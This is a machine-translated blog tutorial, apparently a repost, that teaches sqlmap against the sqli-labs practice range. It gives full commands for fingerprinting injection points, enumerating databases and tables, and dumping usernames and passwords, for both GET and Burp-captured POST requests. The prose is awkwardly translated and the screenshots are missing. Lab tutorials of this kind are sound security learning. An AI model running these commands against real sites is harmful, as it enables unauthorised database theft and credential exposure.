当前位置:网站首页>Sqlmap learning (sqli labs as an example)

Sqlmap learning (sqli labs as an example)

2022-06-25 21:56:00 quan9i

List of articles

Preface

because python What you learn is nothing , The script is not very good ( Can't write ), So learn sqlmap Use , I'm just Xiaobai , If there are any mistakes, please correct them .

sql-map Some instructions

- -is-dba

--is-dba Determine whether the current user is an administrator

- -current

 --current-user: Detect the current user 
--current-db: Detect the current database

-D,-T,-C

-D: Specify database 
-T: Specify data sheets 
-C: Specified field , Space with commas

- -dump

--dump: Get field information

-v

-vx(x Index word )
0: Display only Python Backtracking , Errors and key messages .
1: Display messages and warning messages .
2: Show debug messages .
3: Display payload injection .
4: Show HTTP request .
5: Show HTTP Response head .
6: Show HTTP The content of the response page

–batch

--batch: Use non interactive scanning ,SQLMap Will not ask

get type

Here we use sql-labs The first step is to give an example

Detect injectable types 

python sqlmap.py -u  website

Examples are as follows 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1

The final results are as follows
Insert picture description here Four injection methods are given , Namely get Type injection , An error injection , Time blind note , Joint query injection

There will be three choices in the middle ( Future generations y that will do ), As follows 

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
// Database detected to be mysql, Ask if you want to skip other databases 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
// Prompt whether the scanning level is 1 The risk is 1 All under payload
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
// To obtain parameters id vulnerable . Do you want to continue testing the others , Here our parameter is just one id, So choose y that will do

Get the database 

python sqlmap.py -u  website  --dbs

 explain :-u(--url) refer to url, Website , --dbs It's a database

Examples are as follows 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 --dbs

Execution results
Insert picture description here

Get the table 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D" Table name " --tables

Examples are as follows 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D"security" --tables

The results are as follows
Insert picture description here

To get the column name 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D" Data name " -T" Table name " --columns -v3
//-v3: Show payload

Example :

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D"security" -T"users" --columns -v3

The results are as follows
Insert picture description here

Get field information 

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D" Database name " -T" Table name " -C" Name " --dump -v3

Example :

python sqlmap.py -u http://192.168.134.132/Less-1/?id=1 -D"security" -T"users" -C"id,username,password" --dump -v3

The results are as follows
Insert picture description here

post type

preparation

post When the injection , Can't be used directly sqlmap To crack , But it can be used burpsuite This tool to get content , Copy content to a txt In the text , recycling sqlmap Crack the text , The specific operation is as follows
Open browser proxy , Refresh the interface , send burpsuite Get the contents of the range , Then copy it down
Insert picture description here

Detect injectable types

structure payload as follows 

python sqlmap.py -r  File path  --batch

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\2.txt" --batch

The results are as follows
Insert picture description here

Crack the database

Method 1 

python sqlmap.py -r  File path  --batch --dbs
//-r Specify the path ,--batch Ignore choice  --dbs Is to get the database

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" --batch --dbs

Execution results
Insert picture description here

Method 2 

python sqlmap.py -r  File path  -p Injection parameters  --dbms mysql --dbs
//-r Specify the path ,-p Specify injection parameters ,--dbms It refers to the database management system ,--dbms mysql  On behalf of mysql All data 
--dbs  Refers to getting the database name

Example 

python sqlmap.py -r "D:\sqlmap\3.txt" -p"uname " --dbms mysql --dbs

The results are as follows
Insert picture description here

Crack data table

Method 1 

python sqlmap.py -r  File pathname  -D Database name  --batch --tables

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -D"security" --batch --tables
// obtain security All table names under the library

The results are as follows
Insert picture description here

Method 2 

python sqlmap.py -r  File pathname  -p Injection parameters  --dbms mysql --tables

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -p"passwd" --dbms mysql --tables
// With passwd Is the parameter , stay mysql Get all the table names in the database

The results are as follows
Insert picture description here

To get the column name

Method 1 

python sqlmap.py -r  File path  -D Database name  -T Table name  --batch --columns
//-T Followed by table name , You can get all the column names of the table , When T When not writing, it defaults to all column names of all tables in the database

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -D"security" -T"users" --batch --columns

The results are as follows
Insert picture description here

Method 2 

python sqlmap.py -r  File path -p Injection parameters  --dbms mysql --columns

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -p"passwd" --dbms mysql --columns
// Get the column name under the current database

The results are as follows
Insert picture description here

Get field information

Method 1 

python sqlmap.py -r  File path  -D Database name  -T Table name  -C Name  --dump --batch

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -D"security" -T"users" -C"username,password" --dump --batch

The results are as follows
Insert picture description here

Method 2 

python sqlmap.py -r  File path  -p Injection parameters  --dbms mysql --dump

Examples are as follows 

python sqlmap.py -r "D:\sqlmap\3.txt" -p"passwd" --dbms mysql --dump
// Get all the field information under the current database

Insert picture description here
Insert picture description here

Specify the injection method

sqlmap By default, all available methods are used , When we want to inject in a certain way , What to do
Instructions 

--technique B  Bull's blind note 

--technique E  An error injection 

--technique U union Query Injection 

--technique S  Stack Injection 

--technique T  Time blind note 

--technique Q  Inline query injection

Some examples are as follows

Joint query injection

Insert picture description here

Time blind note 

sqlmap -u"http://192.168.134.132/Less-28a/?id=1" --technique T --time-sec 1 --dbs 
//--technique T Specifies the use of time blinding ,--time-sec 1  Set the time blind injection time to 1,--dbs  Query the database

The results are as follows
Insert picture description here 

 sqlmap -u"http://192.168.134.132/Less-28a/?id=1"  --technique T --time-sec 1 --tables

The results are as follows
Insert picture description here

Insert picture description here

原网站

版权声明
本文为[quan9i]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202181145209290.html

边栏推荐

猜你喜欢

随机推荐